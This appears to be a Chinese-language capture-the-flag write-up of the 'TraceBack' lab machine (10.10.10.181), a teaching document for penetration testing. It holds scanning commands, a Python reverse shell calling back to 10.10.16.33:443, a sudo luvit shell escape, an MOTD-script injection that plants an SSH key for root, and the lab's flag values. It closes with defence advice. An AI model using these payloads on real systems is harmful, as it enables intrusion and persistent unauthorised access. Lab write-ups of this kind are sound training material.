TraceBack 渗透测试教学文档

信息收集阶段

目标识别

• 目标IP: 10.10.10.181
• 开放端口:
  • TCP 22: OpenSSH 7.6p1 (Ubuntu Linux)
  • TCP 80: Apache httpd 2.4.29 (Ubuntu)

扫描技术

1. 存活检测:

   nmap -Pn -sn 10.10.10.181
   

2. 端口扫描:

   sudo masscan -p1-65535,U:1-65535 10.10.10.181 --rate=1000 -e tun0
   

3. 服务版本扫描:

   nmap -Pn -sV -sC -p "22,80" 10.10.10.181
   

SSH指纹信息

2048 9625518e6c830748ce114b1fe56d8a28 (RSA)
256 54bd467114bdb242a1b6b02d94143b0d (ECDSA)
256 4dc3f852b885ec9c3e4d572c4a82fd86 (ED25519)

Web应用渗透

Webshell枚举

1. 使用feroxbuster进行目录扫描:

   feroxbuster -u 'http://10.10.10.181/' -w ./backdoor
   

2. 参考Webshell资源:

   • GitHub仓库: TheBinitGhimire/Web-Shells

反向Shell获取

使用Python反向Shell代码:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.33",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty; pty.spawn("/bin/bash")

横向移动

权限提升至sysadmin

1. 检查sudo权限:

   sudo -l
   

2. 利用luvit执行命令:

   sudo -u sysadmin /home/sysadmin/luvit -e "os.execute('/bin/bash')"
   

3. 获取user flag:

   7ce54557e73840b9267ec0250771ca40
   

权限提升至root

MOTD利用

1. 关键点:

   • MOTD脚本每30秒复制执行一次
   • 必须等待30秒后再执行payload，否则会被清除

2. 攻击步骤:

   echo "echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHW/AdC4GrFM0XNoi5DrRrmUCSfp5EE439+ay1c2JIQq maptnh@maptnh-H4CK13'>/root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header
   

3. 通过SSH登录触发:

   ssh sysadmin@10.10.10.181
   ssh root@10.10.10.181
   

4. 获取root flag:

   3a906703b8fdbe8036a91e9ff9b3edcc
   

技术总结

1. Web应用渗透:

   • 使用目录爆破工具发现潜在漏洞点
   • 部署Webshell获取初始访问权限

2. 权限提升路径:

   webadmin → sysadmin → root
   

3. 关键漏洞利用:

   • luvit的sudo权限滥用
   • MOTD脚本的不安全实现导致的权限提升

4. 防御建议:

   • 限制sudo权限
   • 监控/etc/update-motd.d/目录的修改
   • 定期更新系统和修补已知漏洞
   • 实施最小权限原则